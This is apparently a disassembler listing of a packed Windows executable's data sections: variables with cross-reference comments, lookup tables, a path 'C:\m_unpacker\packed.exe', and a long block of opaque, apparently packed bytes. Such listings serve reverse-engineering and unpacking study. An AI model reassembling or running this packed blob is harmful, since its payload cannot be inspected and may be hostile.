dd 9, 0Ch, 0Ah, 7, 0Bh, 8, 0Ch, 16h, 0Dh, 16h, 0Fh, 2
dd 10h, 0Dh, 11h, 2 dup(12h), 2, 21h, 0Dh, 35h, 2, 41h
dd 0Dh, 43h, 2, 50h, 11h, 52h, 0Dh, 53h, 0Dh, 57h, 16h
dd 59h, 0Bh, 6Ch, 0Dh, 6Dh, 20h, 70h, 1Ch, 72h, 9, 6, 16h
dd 80h, 0Ah, 81h, 0Ah, 82h, 9, 83h, 16h, 84h, 0Dh, 91h
dd 29h, 9Eh, 0Dh, 0A1h, 2, 0A4h, 0Bh, 0A7h, 0Dh, 0B7h
dd 11h, 0CEh, 2, 0D7h, 0Bh, 718h, 0Ch
dword_40E3E8 dd 0 ; DATA XREF: sub_408727+19�o
dword_40E3EC dd 0 ; DATA XREF: sub_401318:loc_40131E�r
; sub_401318+15�w ...
dd 0
dword_40E3F4 dd 0 ; DATA XREF: sub_4018FD+2CD�o
dword_40E3F8 dd 0 ; DATA XREF: sub_401000+12�w
; sub_401210+C7�w ...
dword_40E3FC dd 0 ; DATA XREF: sub_4077D4:loc_407856�w
; sub_40786E+11B�w ...
dd 0
dword_40E404 dd 0A28h ; DATA XREF: sub_404200+52�w
dword_40E408 dd 501h ; DATA XREF: sub_404200+49�w
dword_40E40C dd 5 ; DATA XREF: sub_404200+3E�w
dword_40E410 dd 1 ; DATA XREF: sub_404200+30�w
dword_40E414 dd 1 ; DATA XREF: sub_406661+91�w
dword_40E418 dd 340B20h ; DATA XREF: sub_406661+89�w
align 10h
dword_40E420 dd 340B48h ; DATA XREF: sub_4065A8+44�w
; sub_4086AA+9�r ...
dword_40E424 dd 0 ; DATA XREF: sub_408E3B+36�r
dword_40E428 dd 0 ; DATA XREF: sub_4086AA+16�r
; sub_408AA3+4�r ...
align 10h
off_40E430 dd offset aCM_unpackerPac ; DATA XREF: sub_406661+2E�w
; "C:\\m_unpacker\\packed.exe"
align 8
byte_40E438 db 0 ; DATA XREF: sub_403923+2D�w
; sub_407B2A+5�r
align 4
dword_40E43C dd 0 ; DATA XREF: sub_403923+27�w
dword_40E440 dd 0 ; DATA XREF: sub_403923+4�r
; sub_403923+8B�w
align 8
dword_40E448 dd 0 ; DATA XREF: sub_4039D6+5E�r
; sub_4039D6+A4�w
align 10h
word_40E450 dw 0 ; DATA XREF: sub_4039D6+55�r
; sub_4039D6+9A�o
word_40E452 dw 0 ; DATA XREF: sub_4039D6+48�r
db 2 dup(0)
word_40E456 dw 0 ; DATA XREF: sub_4039D6+3B�r
word_40E458 dw 0 ; DATA XREF: sub_4039D6+2E�r
word_40E45A dw 0 ; DATA XREF: sub_4039D6+21�r
align 10h
dword_40E460 dd 0 ; DATA XREF: sub_404200+84�w
; sub_4065A8:loc_4065BA�r ...
align 8
dword_40E468 dd 0 ; DATA XREF: sub_4042F6�r sub_40431B�r ...
dword_40E46C dd 0 ; DATA XREF: sub_40345E�r
; sub_408845:loc_4088C5�r ...
dword_40E470 dd 0 ; DATA XREF: sub_40433F�r
dword_40E474 dd 0 ; DATA XREF: sub_40520D+4B�w
; sub_405326+2D�w ...
dword_40E478 dd 2 dup(0) ; DATA XREF: seg001:004040FC�o
dword_40E480 dd 0 ; DATA XREF: sub_406234+4�r
; sub_406234+9D�r ...
align 10h
dword_40E490 dd 0 ; DATA XREF: sub_40728A+C7�r
; sub_40728A+101�r ...
align 8
dword_40E498 dd 0 ; DATA XREF: sub_4063CC+3A�r
; sub_4063CC+46�w ...
aCM_unpackerPac db 'C:\m_unpacker\packed.exe',0 ; DATA XREF: sub_406661:loc_406678�o
; seg001:off_40E430�o
align 4
dd 3Ah dup(0)
dword_40E5A0 dd 1 ; DATA XREF: sub_4068AE+2�r
; sub_4068AE+23�w ...
dword_40E5A4 dd 0 ; DATA XREF: sub_406B8B+21�r
dword_40E5A8 dd 0 ; DATA XREF: sub_40728A+11�w
; sub_40728A+63�w ...
align 10h
dword_40E5B0 dd 0 ; DATA XREF: sub_40728A+33�o
; sub_40728A+46�r
dword_40E5B4 dd 10h dup(0) ; DATA XREF: sub_40728A+C1�o
word_40E5F4 dw 0 ; DATA XREF: sub_4074E8+A8�r
word_40E5F6 dw 0 ; DATA XREF: sub_40728A+54�r
; sub_4074E8+DB�r ...
word_40E5F8 dw 0 ; DATA XREF: sub_4074E8+CA�r
word_40E5FA dw 0 ; DATA XREF: sub_4074E8+D3�r
; sub_4074E8:loc_4075DA�r
word_40E5FC dw 0 ; DATA XREF: sub_4074E8+C0�r
word_40E5FE dw 0 ; DATA XREF: sub_4074E8+B8�r
word_40E600 dw 0 ; DATA XREF: sub_4074E8+B0�r
word_40E602 dw 0 ; DATA XREF: sub_4074E8+9E�r
dword_40E604 dd 0 ; DATA XREF: sub_40728A+4B�r
dword_40E608 dd 10h dup(0) ; DATA XREF: sub_40728A+FB�o
word_40E648 dw 0 ; DATA XREF: sub_4074E8+46�r
word_40E64A dw 0 ; DATA XREF: sub_40728A:loc_407301�r
; sub_4074E8+78�r ...
word_40E64C dw 0 ; DATA XREF: sub_4074E8+67�r
word_40E64E dw 0 ; DATA XREF: sub_4074E8+70�r
; sub_4074E8:loc_40756C�r
word_40E650 dw 0 ; DATA XREF: sub_4074E8+5D�r
word_40E652 dw 0 ; DATA XREF: sub_4074E8+55�r
word_40E654 dw 0 ; DATA XREF: sub_4074E8+4D�r
word_40E656 dw 0 ; DATA XREF: sub_4074E8+3E�r
dword_40E658 dd 0 ; DATA XREF: sub_40728A+80�r
dword_40E65C dd 0 ; DATA XREF: sub_40728A+132�r
; sub_40728A:loc_4073D6�r ...
dword_40E660 dd 0 ; DATA XREF: sub_407275�r sub_407275+E�w
dword_40E664 dd 0 ; DATA XREF: sub_407A1B�w
dword_40E668 dd 1 ; DATA XREF: sub_407C95+26�r
; sub_407C95:loc_407CFF�w
dword_40E66C dd 1 ; DATA XREF: sub_407DDE+28�r
; sub_407DDE+4C�w ...
dword_40E670 dd 1 ; DATA XREF: sub_40806F:loc_4081EA�r
; sub_408208+4�w ...
dword_40E674 dd 0 ; DATA XREF: sub_40844F+3�r
; sub_40844F+2E�w ...
dword_40E678 dd 0 ; DATA XREF: sub_40844F+43�w
; sub_40844F:loc_40849E�r
dword_40E67C dd 0 ; DATA XREF: sub_40844F+4A�w
; sub_40844F+60�r
dword_40E680 dd 0 ; DATA XREF: sub_408BBE+28�r
; sub_408BBE+48�w ...
word_40E684 dw 0 ; DATA XREF: sub_401586+24�r
; sub_4018FD+91�w
align 4
dword_40E688 dd 0 ; DATA XREF: sub_402EED+1B�r
; sub_402F19+38�w ...
dd 5 dup(0)
dword_40E6A0 dd 0 ; DATA XREF: sub_402EED:loc_402EF9�o
; sub_402F19+18�o ...
dword_40E6A4 dd 0 ; DATA XREF: sub_402EED+11�w
; sub_402F19+4D�w ...
dword_40E6A8 dd 0 ; DATA XREF: sub_402F19+43�w
dword_40E6AC dd 0 ; DATA XREF: sub_402F19+2A�w
dword_40E6B0 dd 0 ; DATA XREF: sub_402F19+1E�w
dword_40E6B4 dd 0 ; DATA XREF: sub_402F19+3D�w
dword_40E6B8 dd 0 ; DATA XREF: sub_402F19+24�w
align 10h
dword_40E6C0 dd 0 ; DATA XREF: sub_401635+28D�o
; sub_4018FD+71�o ...
dword_40E6C4 dd 0 ; DATA XREF: sub_4018FD+53A�w
; sub_4018FD+7C0�w ...
dword_40E6C8 dd 0 ; DATA XREF: sub_4018FD+FD�r
; sub_4018FD+1E5�r ...
align 10h
dword_40E6D0 dd 0 ; DATA XREF: sub_4018FD+C70�r
dword_40E6D4 dd 0 ; DATA XREF: sub_4018FD+5CE�w
; sub_4018FD+770�w ...
dword_40E6D8 dd 0 ; DATA XREF: sub_4018FD+20B�w
; sub_4018FD+250�r ...
dword_40E6DC dd 0 ; DATA XREF: sub_4018FD:loc_401A20�r
; sub_4018FD:loc_401BAB�r
dword_40E6E0 dd 0 ; DATA XREF: sub_4018FD+5C2�w
; sub_4018FD+B69�r ...
dd 5 dup(0)
dword_40E6F8 dd 0 ; DATA XREF: sub_4018FD+266�r
; sub_4018FD+290�r ...
dd 2DFh dup(0)
dword_40F278 dd 2 dup(0) ; DATA XREF: sub_401635+2A1�o
dword_40F280 dd 2 dup(0) ; DATA XREF: sub_401635+2A9�o
; sub_4018FD+60�o ...
dword_40F288 dd 0 ; DATA XREF: sub_4018FD+CA�r
; sub_4018FD+1BE�r
dd 0Ch dup(0)
dword_40F2BC dd 4E4h ; DATA XREF: sub_40806F+14�r
; sub_40806F+65�w ...
dword_40F2C0 dd 3 dup(0) ; DATA XREF: sub_40806F+123�o
; sub_40806F+171�o ...
dword_40F2CC dd 0 ; DATA XREF: sub_40806F+108�w
; sub_40806F+15D�w ...
dd 4 dup(0)
byte_40F2E0 db 0 ; DATA XREF: sub_4082AE:loc_4083BA�w
; sub_4082AE:loc_4083D7�w ...
align 4
dd 0Fh dup(0)
dd 63626100h, 67666564h, 6B6A6968h, 6F6E6D6Ch, 73727170h
dd 77767574h, 7A7978h, 0
dd 43424100h, 47464544h, 4B4A4948h, 4F4E4D4Ch, 53525150h
dd 57565554h, 5A5958h, 0
dd 83000000h, 0
dd 9A0000h, 9E009Ch, 2 dup(0)
dd 8A0000h, 0FF8E008Ch, 2 dup(0)
dd 0AA0000h, 2 dup(0)
dd 0B500h, 0BA0000h, 0
dd 0E3E2E1E0h, 0E7E6E5E4h, 0EBEAE9E8h, 0EFEEEDECh, 0F3F2F1F0h
dd 0F6F5F4h, 0FBFAF9F8h, 0DFFEFDFCh, 0C3C2C1C0h, 0C7C6C5C4h
dd 0CBCAC9C8h, 0CFCECDCCh, 0D3D2D1D0h, 0D6D5D4h, 0DBDAD9D8h
dd 9FDEDDDCh
byte_40F3E0 db 0 ; DATA XREF: sub_40806F+5C�o
; sub_40806F+AF�o ...
byte_40F3E1 db 0 ; DATA XREF: sub_4066FA+3F�r
; sub_4066FA+84�r ...
align 4
dd 0Fh dup(0)
dd 10100000h, 6 dup(10101010h), 0
dd 20200000h, 6 dup(20202020h), 2 dup(0)
dd 20h, 10000000h, 10001000h, 2 dup(0)
dd 20000000h, 20002000h, 10h, 0
dd 20000000h, 2 dup(0)
dd 200000h, 20000000h, 0
dd 10101000h, 5 dup(10101010h), 10101000h, 10101010h, 6 dup(20202020h)
dd 20202000h, 20202020h, 20h
dword_40F4E4 dd 0 ; DATA XREF: sub_40806F+6E�w
; sub_40806F+12B�w ...
dword_40F4E8 dd 341110h ; DATA XREF: sub_407A85+28�w
; sub_407A85+41�w ...
dd 5 dup(0)
dword_40F500 dd 400h dup(0) ; DATA XREF: seg001:off_40DEE0�o
; seg001:0040DEE8�o
dword_410500 dd 200h ; DATA XREF: sub_407A85�r
; sub_407A85:loc_407A9F�w ...
dd 7 dup(0)
dword_410520 dd 340650h ; DATA XREF: sub_405802+B1�r
; sub_4069E0:loc_406A00�w ...
dword_410524 dd 3Fh dup(0) ; DATA XREF: sub_4069E0+92�o
dword_410620 dd 20h ; DATA XREF: sub_4069E0+26�w
; sub_4069E0:loc_406A6A�r ...
dword_410624 dd 0 ; DATA XREF: sub_40452C+3C�w
; sub_404BD1+5�r ...
dword_410628 dd 0 ; DATA XREF: sub_40459F+23A�r
; sub_40459F+25A�r ...
dword_41062C dd 0 ; DATA XREF: sub_40452C+31�w
; sub_40459F+311�w ...
dword_410630 dd 0 ; DATA XREF: sub_40452C+21�w
; sub_40459F+22D�r ...
dword_410634 dd 0 ; DATA XREF: sub_40452C+28�w
; sub_404574�r ...
dword_410638 dd 0 ; DATA XREF: sub_40452C+15�w
; sub_404574+8�r ...
dword_41063C dd 0 ; DATA XREF: sub_40349C+F�r
; sub_40452C+36�w ...
dword_410640 dd 340000h ; DATA XREF: sub_40349C+66�r
; sub_403B18+5A�r ...
dword_410644 dd 1 ; DATA XREF: sub_40349C�r sub_403B18+C�r ...
dword_410648 dd 142340h ; DATA XREF: sub_404200+7A�w
; sub_406550+F�r ...
dword_41064C dd 1 ; DATA XREF: sub_4065A8+AD�w
; sub_4086AA�r
dword_410650 dd 1 ; DATA XREF: sub_406550�r sub_4065A8+3�r ...
dword_410654 dd 0 ; DATA XREF: sub_403923+3E�r
dword_410658 dd 0 ; DATA XREF: sub_403923+35�r
; sub_403923+57�r
dword_41065C dd 0 ; DATA XREF: sub_4038D4�r
align 2000h
seg001 ends
; Section 2. (virtual address 00012000)
; Virtual size : 00007000 ( 28672.)
; Section size in file : 00007000 ( 28672.)
; Offset to raw data for section: 00012000
; Flags C00000E0: Text Data Bss Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Uninitialized
; Segment permissions: Read/Write
seg002 segment para public 'BSS' use32
assume cs:seg002
;org 412000h
assume es:nothing, ss:nothing, ds:seg001, fs:nothing, gs:nothing
dword_412000 dd 748B0056h, 0F6850824h, 6A000575h, 0C35E5807h, 0E1106683h
; DATA XREF: seg002:00417FB0�o
dd 38F825D0h, 0F7040E3h, 6A28468Dh, 76FF50A0h, 0FB30E808h
dd 0C0851C23h, 61307974h, 483D13ECh, 660AB727h, 0C08E0C5h
dd 0C4104735h, 103322D4h, 2396A04h, 60574EBh, 0C468958h
dd 18784D1Dh, 5510C033h, 51EC188Bh, 875D053h, 16A570Ch
dd 3689D65Fh, 0DD16FC7Dh, 6294E937h, 38BA710Ah, 3A686C24h
dd 9DE82A02h, 87AC66Ah, 350427Dh, 731DEB45h, 53455D8Bh
dd 826355E8h, 4B142216h, 0FFF8831Eh, 40160BD9h, 2C194616h
dd 2F1627EBh, 7752051h, 0C7EFCh, 3FEBC78Bh, 0A48BF0Fh
dd 51F640F0h, 8D30FF10h, 29E85006h, 0C47F6924h, 101475FCh
dd 38D5C766h, 1EE81B02h, 176DE5Fh, 0FC458D2Ah, 0E87E6850h
dd 0E6A48004h, 0B2181B45h, 5B5E145Fh, 0B4D0B5C9h, 5822B390h
dd 8A054540h, 48B08F08h, 105011ACh, 4A222F1h, 383DEB03h
dd 57302C32h, 7E8D0CC6h, 7CC2866h, 41B96ACBh, 41571141h
dd 53A4FD6Bh, 5B725F2Fh, 2810EB3Ah, 0B5557232h, 5EB1213h
dd 8F5B1719h, 0A2228C10h, 128D9A5Eh, 5789018Ch, 7DEC5874h
dd 20F10Ch, 389A651h, 0C757563Ch, 18CC0845h, 0A62344DEh
dd 0DD88DFE5h, 28470950h, 485BB819h, 4EDC1560h, 0D3FC9BA8h
dd 58212855h, 1475EB9Dh, 8B08471Ah, 1E620C58h, 0EBCAC510h
dd 0F9DF5003h, 726B5D28h, 1103581h, 33B23058h, 0F3043BDBh
dd 0F45D8957h, 88E3B198h, 2450468Bh, 3241082h, 201857C7h
dd 30C33BBFh, 0F8C8959h, 1AA0C984h, 191244Eh, 51C80300h
dd 0A122B7E8h, 0DFB11C29h, 42237442h, 9084248Ch, 16A10A75h
dd 82950A71h, 7E639299h, 7601C5Eh, 7E03082Eh, 1C85F824h
dd 5EFFFEF4h, 18C5E86Ah, 2C5053F8h, 8532C724h, 900121F0h
dd 8E2815DFh, 0A88EF851h, 56F52907h, 75DD4E1Ch, 3F984058h
dd 3EECA421h, 83541C7Eh, 1076CE08h, 0C5921D69h, 3505069Bh
dd 1973C73Bh, 39F0E210h, 0C94DA8F4h, 46F10655h, 4E24DD04h
dd 11450A1Ch, 7B20311Eh, 0A4E8785Eh, 83009391h, 0BBBBE56h
dd 0ECA11C1Ah, 0E7A498Dh, 3468C4A4h, 0EC1BC2C4h, 57305911h
dd 57208101h, 3A3C573h, 566A7413h, 6F180897h, 28448D49h
dd 509E1C24h, 0DD749D46h, 1E355411h, 0BEA2E814h, 0C681CFDFh
dd 0BFB10349h, 0E194CA7h, 0A251B8Ah, 7EE81461h, 0F08B8AD4h
dd 1060B276h, 0F727991h, 13C68B16h, 0DE53244Fh, 47B175B6h
dd 48A41A0h, 206CF522h, 9B98FB46h, 34893979h, 410D7511h
dd 0D80BEBF9h, 7C32830Fh, 43745624h, 0A48E9506h, 541CFE45h
dd 26FFF457h, 0C6ECF73Bh, 27A3934Dh, 20268613h, 64E8A777h
dd 2EC39636h, 355321FDh, 0D3C6486Dh, 927C2642h, 282068C3h
dd 9FC21111h, 570F77A6h, 0B25DAF56h, 5550B835h, 9157B2B5h
dd 0C2337F5Fh, 264A112Ch, 1FA5884Ch, 0AA8B30D0h, 60B140A4h
dd 32F5B31Fh, 9B295614h, 4B1622F5h, 2819F599h, 20543A16h
dd 9808A2CDh, 0E2F6B32Fh, 0A9322033h, 27F7B812h, 2653B31Fh
dd 0A9914890h, 0F1CA5246h, 0A69C931Bh, 52E54C01h, 41C2A53h
dd 512553A9h, 0E4187F6Fh, 53911EE6h, 2490444h, 58234A35h
dd 58027BB4h, 4D1EDEE8h, 0F7312048h, 0C92351C2h, 413C7684h
dd 800E6856h, 78454434h, 0B03413C4h, 0C8524940h, 0A2C611A8h
dd 0F7B03E8h, 0E68405B7h, 22FA2948h, 30682AC4h, 60984920h
dd 33181142h, 25BF1CF6h, 4C3836E1h, 8C8A0A72h, 8D0A1635h
dd 0D0820784h, 900888E1h, 0B0465027h, 3B4DC078h, 0DC7259F0h
dd 0E83412A6h, 57672288h, 229AF7DDh, 92775E3h, 17F8A32h
dd 0BBA06814h, 15D9C30Dh, 0E903DEB8h, 0AF27435Bh, 250A5C70h
dd 0E83578Bh, 3B876808h, 9F1EECAEh, 0C580F07h, 0C19230EDh
dd 62E811F6h, 0B8327728h, 0F1C4C0B5h, 870FF00Ah, 2AACDF32h
dd 0B80D2218h, 8008CA02h, 208A1C13h, 2A7E7424h, 8170053Ah
dd 0C0C80FEh, 84C0105Eh, 44024C40h, 3813A01h, 5812808h
dd 1B400E93h, 1F06100Dh, 99850F80h, 8C68150Fh, 0BE2890B2h
dd 2174420Ah, 886C10B4h, 226444AAh, 85811A0h, 44428496h
dd 3C108C21h, 24448288h, 0D92D7822h, 7974B98Ch, 54840410h
dd 0A4C07471h, 11066884h, 11174684h, 1D688484h, 15108411h
dd 3A441088h, 30110422h, 0B144F408h, 12838A26h, 1909E8B9h
dd 87147883h, 0D8B6052Dh, 70FF1217h, 0A0205D18h, 0BC68511Ah
dd 0D726841Fh, 0E91AB355h, 93415F05h, 2E0CBCB8h, 71A87E80h
dd 70E84382h, 0D9D492B8h, 7B77062Ch, 45F07274h, 9063E126h
dd 54888C10h, 45888D10h, 36888E10h, 24888F10h, 12889010h
dd 750F9111h, 4DF46871h, 78F49622h, 88C0AA1h, 82428460h
dd 0EB3B5022h, 738A87Bh, 2042747Eh, 0C216D3Fh, 0F888661Fh
dd 925F99B0h, 52741193h, 88941090h, 88951043h, 88961034h
dd 75FD1225h, 10095819h, 0E4506807h, 0D8EE2837h, 0F92107A1h
dd 0FD1A08C8h, 0F91311F6h, 0FC0C089Ch, 5488484h, 110F6AB9h
dd 21110BCAh, 0ED25938h, 47CD533Fh, 0CC486884h, 0DE96B1E7h
dd 40291046h, 2CDC33FEh, 50892E24h, 0C0928457h, 4BB6BE4Eh
dd 928E3916h, 6F83074Bh, 3E05FB38h, 3CC68359h, 0F2788A06h
dd 0E9720C2Ah, 0E80F8068h, 8162251h, 5064573Ch, 456BC6Ah
dd 1220043Fh, 9A6AC84Ch, 20A16CB8h, 64813F0Ah, 770386E7h
dd 25893850h, 0B8E25144h, 0E307944Ah, 98E96AE8h, 0B86589E8h
dd 19DB4B53h, 1054907Ah, 0E3026850h, 1B163988h, 978E30BBh
dd 0C8F08B59h, 0F8FC8B4h, 308834AFh, 3C6A690Eh, 7FBE5153h
dd 8F581C9Bh, 570BC237h, 0E843AC6Ah, 1E214A48h, 0F1F2150Fh
dd 0FDB99906h, 0F7020CFBh, 1C281F9h, 58967A04h, 1F93E415h
dd 6E5098EBh, 0B7ABF779h, 0D6FB938Dh, 1848E821h, 15868053h
dd 0D40E6483h, 9D8943C4h, 0C4E87B7Ch, 6F1800Ch, 0F6D588A1h
dd 239DF785h, 0B32EB4C7h, 4C206236h, 502186FEh, 0BD83210Dh
dd 69733201h, 940858Bh, 0F23CC06Bh, 0D7C86088h, 4E7ECB3Bh
dd 7C3238D0h, 8B13730Ah, 8C9D5295h, 0CF348E8h, 0DC983139h
dd 881C744Dh, 0CDF18048h, 248EE6CAh, 90F084EEh, 8D3B140Dh
dd 6760A68h, 0D4BF0889h, 8E5CEB61h, 0B85328E8h, 25F28422h
dd 8C1957E8h, 20F52C7h, 889D9A90h, 0DA1F15D0h, 1F462F4Eh
dd 8BFE71EAh, 0D496B6A6h, 9196B08h, 3713B968h, 488C342Ah
dd 29430F46h, 0F5355273h, 4F3EE81Ah, 52572850h, 8B4382E8h
dd 3CF618B5h, 49E3921h, 0CC8D2A75h, 139B5729h, 39F6AA09h
dd 0BF201B5Ch, 891E44CFh, 3DD88631h, 382207C7h, 0B429C247h
dd 1E492152h, 0F328E83h, 72528A8Ah, 9A0CCC0h, 7820CAA4h
dd 8A8AC8EFh, 83312B44h, 2372F0F8h, 3FF66EA4h, 18740303h
dd 4EF8868Bh, 7F40817h, 0F1F4971Eh, 8C907D82h, 8D556A07h
dd 0D472780Fh, 106DE22Ah, 46A3868Dh, 32601A21h, 7422DCEEh
dd 0E62F4E2Bh, 1486A4B6h, 0FF183FE8h, 1C8215C9h, 3108E3F4h
dd 59F635C2h, 45862138h, 21AEC201h, 3994C5EAh, 5433A84h
dd 4D07C740h, 67D59F06h, 9D129FD0h, 9176D9F7h, 8014266Eh
dd 470A18BDh, 46090D74h, 7292C50h, 6409FA02h, 6C5E90DEh
dd 0B58D80EEh, 64E719A3h, 8A0C9074h, 0C1A83A06h, 3F8203Ch
dd 0EDEB4606h, 4C103E80h, 5B27314h, 0D3E99D98h, 46145894h
dd 1E38872Dh, 0E06AE162h, 82B32C31h, 65A0F141h, 0CBED2818h
dd 7C40509h, 290C2126h
dd 8554DE68h, 192F3C11h, 4C09B183h, 0E96CEB3Ch, 0C6041F2Eh
dd 249D752Eh, 2B877054h, 0AA812DA9h, 772EC5DAh, 22692689h
dd 10EE743Ch, 56811DD3h, 1321A8E6h, 8E1810C2h, 7FBDB470h
dd 8E751FFFh, 125A75FAh, 0C476EC22h, 844F98E2h, 1E8814F1h
dd 75C2F939h, 10A6C70Ah, 0D4C8D950h, 0DE6C6210h, 54146911h
dd 1DAC14C7h, 25581989h, 1FB9114h, 8C880E8Ah, 0DA104605h
dd 3119D756h, 84C67DFBh, 0FD201653h, 1A61D634h, 58551F11h
dd 8A837265h, 9C7DE3E4h, 0C383E8C5h, 93CECC75h, 0F32D8515h
dd 7865F556h, 41EB3964h, 0AF277D3h, 20B6841Ch, 0E89F93AFh
dd 6150F513h, 31B46BD1h, 6456393Ah, 42589Eh, 5884C9B6h
dd 9A202398h, 6786EC02h, 90619C4h, 43641D94h, 14CC7958h
dd 28EBD354h, 0CBA930AFh, 9F724259h, 1BC41528h, 5BC8020h
dd 0A1D8B61h, 17581774h, 0D848704h, 0ED287175h, 43881C44h
dd 0A7EB129Ch, 94A959A5h, 75B34310h, 0E086E315h, 144A4C88h
dd 210C1B0Bh, 1AFF89D4h, 58662832h, 8D8AE985h, 8941BE88h
dd 642F88Eh, 16E910B8h, 4503FF63h, 0D1B3C2E4h, 4CAA283Fh
dd 5CCAD058h, 406E79C2h, 73F03B7Fh, 359A1450h, 752012A0h
dd 10254E48h, 0AFA7DE5Ch, 1D840D51h, 40B963FDh, 0BD1589C4h
dd 0E54CDE60h, 46287C0Ah, 3C802460h, 1584C837h, 5212EB70h
dd 56792A46h, 0D12B098Eh, 0FCC70856h, 371C8805h, 52DC4C78h
dd 9899921Bh, 2D75213Ah, 0E39242CCh, 379138Bh, 0BCBA31F7h
dd 86540C1Dh, 3B934584h, 9C1ACFACh, 103F4F67h, 4F8688ECh
dd 3414B78Fh, 86575118h, 3B9BF03Ch, 952D7489h, 0F3C80837h
dd 4D59D068h, 5349E91Ch, 0A530485Ah, 9604B425h, 0A28E1969h
dd 59195D33h, 0B4A18A8Ch, 0BC85CF70h, 0D9869BFBh, 5020B03h
dd 85C62F75h, 9D8809A2h, 6A2E8F44h, 2458D302h, 70CE86F1h
dd 5A2100Bh, 0C8046616h, 8A768DD4h, 881B8E64h, 0B2C9CAC4h
dd 0C528FF1h, 49142B78h, 54847C7Ch, 7D0FBD8Ah, 26934AB6h
dd 9247100Ah, 90909123h, 0D4206885h, 0F43162D1h, 24589066h
dd 3C69A2B2h, 28858170h, 506E8973h, 0B401384Dh, 2805EEC3h
dd 18432A3Fh, 0B8991E8Bh, 0AD402214h, 42C71B1Ch, 7A325380h
dd 0E9044484h, 101FE269h, 0B3FDF0FEh, 0F5F1806h, 0B503F83h
dd 14B7A92h, 46DB2A7Ch, 1601011h, 0F14773A8h, 0BA9D4C5Fh
dd 8A6AE91Bh, 59F131AFh, 900CAF4Ch, 18F446Bh, 3D487524h
dd 19B7887Dh, 8F821844h, 919B4794h, 42EB1495h, 75038251h
dd 6A39B33Fh, 70409068h, 125531E8h, 8A1E0C78h, 0A058C21h
dd 9F438D88h, 2D925284h, 23994ADFh, 6F694F65h, 2E88951Fh
dd 169570EDh, 8F7C3C87h, 4957E958h, 75898B01h, 7028319h
dd 36A6B258h, 0A02B5922h, 1F88360h, 6D82340Fh, 4A81042Dh
dd 5A890DECh, 9C173E90h, 0C122806Bh, 0BF846EC7h, 15FF4208h
dd 84E98B79h, 394AA9E7h, 0F0AC33E4h, 96A1316h, 0C1104E8Ah
dd 758DD316h, 0F80448D8h, 5875E6F9h, 8D22401Bh, 85875A4Eh
dd 5118268Ah, 91EDEA4Eh, 56EB8DE3h, 0F6C4040h, 0B258E068h
dd 0EEDD84F9h, 3484645Ch, 1D74C128h, 0D92B5488h, 8E0C9173h
dd 663EC62Ch, 0EB33DA01h, 480644B8h, 0E02148ACh, 14171F08h
dd 0C8900C50h, 4F58922Ah, 7E99110h, 0A21268Bh, 0A050EB01h
dd 0C80B2179h, 1A5BC40Bh, 2B901056h, 21A44368h, 1FB6B44Dh
dd 0EF32492Bh, 0DA2C2A49h, 626F13AAh, 10D237E9h, 1DDDAC89h
dd 0F2A117DAh, 31ECF862h, 0A09068B0h, 1F5839B9h, 0D2B4751Ch
dd 3500F07h, 273D529Dh, 9EA6E5B4h, 0EB81023h, 9E907485h
dd 0EE54111Fh, 60257DD4h, 0D0B66DA3h, 471E5846h, 6D8B29ADh
dd 4F4F322Eh, 0A0E8A675h, 0C3590FABh, 8323658Bh, 7ED7FC4Dh
dd 8964859Fh, 3E8EF50Dh, 91819573h, 907C040Ch, 0FEF88C98h
dd 1F56881h, 0F2AA352Fh, 3D8B0D0Bh, 73E0D08h, 0A06BB48h
dd 53500CA4h, 10376830h, 495C22B4h, 0D7FF0480h, 5304358Bh
dd 92245EC2h, 8FE9043Ch, 0F1402AC8h, 646A0F4Ch, 50086101h
dd 0D6F46687h, 0D841888Dh, 0D0289B3h, 54213B0Eh, 8DB3A470h
dd 65DB330Eh, 3C396C68h, 71980342h, 0FBF40ABDh, 0B50452B7h
dd 8E4350CCh, 421214BFh, 2102581Eh, 0FCF88858h, 0E9800325h
dd 25368519h, 21484632h, 88D091FDh, 7A58BEFCh, 288A2D48h
dd 0A0112192h, 3CFECA92h, 322C5A91h, 288A9F4Ah, 23680FB5h
dd 10A43410h, 8F41D305h, 0E2516958h, 63554853h, 8046A12h
dd 5D930833h, 9110D4E0h, 24BF6553h, 57DB31D1h, 2824D889h
dd 301776D5h, 55144518h, 624E550h, 74B44488h, 9C22FFFDh
dd 993A8204h, 2F954847h, 94E92C57h, 0A1841015h, 0BB315B5Dh
dd 8183EF48h, 0F865D053h, 549256E0h, 94DF5749h, 648A4205h
dd 0D689BB7Ch, 0E8B54942h, 5F45C77Dh, 38B825F4h, 60CA14E3h
dd 0E320BFF4h, 0C9CDBCFFh, 3D34A4D3h, 482BA786h, 38CDD353h
dd 0F832894Ah, 52B00A5Fh, 29114839h, 0F8452DB0h, 71A01148h
dd 85940CF4h, 18C9332Bh, 8202089Ch, 4826661Ch, 155001B5h
dd 4999AC08h, 79927D62h, 22140DB8h, 38766241h, 0FC1182B5h
dd 247873FEh, 88179000h, 780B4BFCh, 4018D490h, 44114DF5h
dd 943C26C4h, 0FC6304B5h, 980A489Dh, 18B9542h, 0EC203115h
dd 7A1A94A2h, 0C8BFAD01h, 855522B5h, 0AC21BE53h, 0AE4A5657h
dd 41167419h, 68588A53h, 2341D1Fh, 960C1A09h, 4F8E81B3h
dd 6605DA14h, 8599C052h, 0BD9EC989h, 0C0210148h, 0F6335056h
dd 4F3F7068h, 0C8F0820Fh, 0C5282345h, 529CF852h, 2C37C92Ah
dd 84F4B782h, 0BE515671h, 52A5DE5Ah, 17202214h, 22221C9Bh
dd 531B84D0h, 5E8A7610h, 53BDCC74h, 46B575A7h, 82B0EBCh
dd 1199266Ah, 1562AADh, 0DDCEE5ABh, 20454E84h, 3B35056Bh
dd 8752B1C6h, 1588D45h, 5216DEB6h, 9E452D80h, 4B9FB9DAh
dd 60A24E25h, 11C2F7C0h, 0A5D3181Ch, 494B20A0h, 0BF8A5018h
dd 390F6D14h, 60874176h, 0A8AB55Fh, 1124E38h, 1925F084h
dd 40892FB8h, 1C157CF9h, 78E9E146h, 0CAE431A1h, 4B8C359h
dd 0E8141670h, 0C8E913C0h, 0DFDB900Ch, 7D0AC963h, 0D940B7C4h
dd 0B401D228h, 8E5283Dh, 4405E594h, 0E10E708Dh, 253DEAF3h
dd 6349FC90h, 4E78BF20h, 0DD202F91h, 81A4E2DBh, 13469D88h
dd 5024526Ah, 1523D129h, 10224950h, 161CEB6Dh, 7F509A1Bh
dd 5624845Ch, 2549DCBBh, 0DF5FA484h, 56AC41ADh, 5F698036h
